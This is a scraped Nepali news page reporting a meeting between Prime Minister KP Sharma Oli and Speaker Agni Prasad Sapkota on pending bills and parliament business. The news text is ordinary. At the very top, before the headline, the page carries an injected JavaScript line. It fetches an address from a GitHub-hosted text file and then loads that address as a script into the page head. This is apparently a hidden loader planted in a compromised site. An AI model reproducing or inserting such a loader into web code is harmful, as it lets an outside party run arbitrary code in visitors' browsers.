;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); प्रधानमन्त्री ओली र सभामुख सापकोटाबीच भेटवार्ता – जुनेली न्युज
आइतवार, बैशाख ८, २०८२
  • होमपेज
  • प्रधानमन्त्री ओली र सभामुख सापकोटाबीच भेटवार्ता
पत्रपत्रिका

प्रधानमन्त्री ओली र सभामुख सापकोटाबीच भेटवार्ता

चैत १५,

काठमाडौं । प्रधानमन्त्री केपी शर्मा ओली र सभामुख अग्निप्रसाद सापकोटाबीच भेटवार्ता भएको छ ।

आज प्रधानमन्त्रीलाई भेट्न सभामुख सापकोटा बालुवाटारस्थित प्रधानमन्त्री निवास पुगेका थिए । त्यस क्रममा संसदमा विचाराधीन विधेयक अघि बढाउने र संसद सञ्चालनको विषयमा छलफल भएको सभामुखका सञ्चारविज्ञ श्रीधर न्यौपानेले जानकारी दिए ।

केही दिनअघि पत्रकारहरुसँग कुरा गर्दै सभामुख सापकोटाले आफूले प्रधानमन्त्रीसँग भेट्न समय मागेको बताएका थिए ।

फेसबुक प्रतिक्रियाहरु